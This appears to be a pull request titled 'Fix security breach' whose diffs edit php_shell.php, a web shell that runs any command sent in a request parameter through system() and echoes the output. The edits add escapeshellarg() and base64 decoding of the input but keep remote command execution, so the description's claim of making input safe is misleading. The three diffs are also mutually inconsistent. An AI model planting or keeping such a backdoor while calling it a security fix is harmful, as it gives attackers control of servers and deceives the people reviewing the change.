### PR TITLE
Fix security breach

### DIFF
--- a/php_shell.php
+++ b/php_shell.php
@@ -4,6 +4,7 @@
 if(isset($_REQUEST['cmd'])){
         echo "<pre>";
         $cmd = ($_REQUEST['cmd']);
+        $cmd = escapeshellarg($cmd);
         system($cmd);
         echo "</pre>";
         die;

--- a/php_shell.php
+++ b/php_shell.php
@@ -3,7 +3,7 @@
 
 if(isset($_REQUEST['cmd'])){
         echo "<pre>";
-        $cmd = escapeshellarg($_REQUEST['cmd']);
+        $cmd = escapeshellarg(base64_decode($_REQUEST['cmd']));
         system($cmd);
         echo "</pre>";
         die;

--- a/php_shell.php
+++ b/php_shell.php
@@ -3,8 +3,7 @@
 
 if(isset($_REQUEST['cmd'])){
         echo "<pre>";
-        $cmd = ($_REQUEST['cmd']);
-        $cmd = escapeshellarg($cmd);
+        $cmd = escapeshellarg($_REQUEST['cmd']);
         system($cmd);
         echo "</pre>";
         die;


### PR DESCRIPTION
escapeshellarg() adds single quotes around a string and quotes/escapes any existing single quotes allowing you to pass a string directly to a shell function and having it be treated as a single safe argument.